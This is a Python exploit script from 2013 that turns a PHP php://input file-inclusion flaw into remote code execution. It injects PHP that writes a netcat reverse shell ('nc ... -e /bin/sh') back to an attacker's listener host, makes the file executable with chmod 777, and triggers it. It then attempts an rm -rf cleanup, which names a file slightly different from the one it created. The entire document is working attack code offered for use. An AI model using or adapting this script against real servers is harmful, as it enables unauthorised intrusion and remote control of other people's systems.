#!/usr/bin/python
# Insecurety Research 2013
# - infodox
import requests
import sys

print """php://input File Inclusion to Remote Code Execution Exploit"""
if (len(sys.argv) != 4):
    print "Usage: " + sys.argv[0] + " <url> <lhost> <lport>"
    sys.exit(0)

url = sys.argv[1]
lhost = sys.argv[2]
lport = sys.argv[3]

phpinput = """php://input"""
reverseme = """reversemyshells.php"""

phppayload = """<?php
$f = fopen("reversemyshells.php", "a");
fwrite($f, "<?php system('nc %s %s -e /bin/sh'); ?>");
fclose($f);
?>""" %(lhost, lport)

executable = """<?php system('chmod 777 reversemyshells.php'); ?>"""

print "\n[+] Using %s as target URL" %(url)
print "[+] Using %s as listener host" %(lhost)
print "[+] Using %s as listener port" %(lport)
inject = url+phpinput
print "[!] Warning: This method only works if the current working directory is writeable"
print "\n[*] Injecting Shell..."
requests.post(inject, phppayload)
print "[*] Making Shell Executable..."
requests.post(inject, executable)
print "[*] I hope you have that netcat listener ready!"
print "[*] Popping the shell :)"
getshell = url + reverseme
requests.get(getshell)
print "\n[+] Trying to clean up the reverse shell..."
print "[*] Note: This is NOT reliable remover! It fails a lot."
cleaner = """<?php system('rm -rf reversemyshell.php'); ?>"""
requests.post(inject, cleaner)
print "[+] Have a nice day :)"
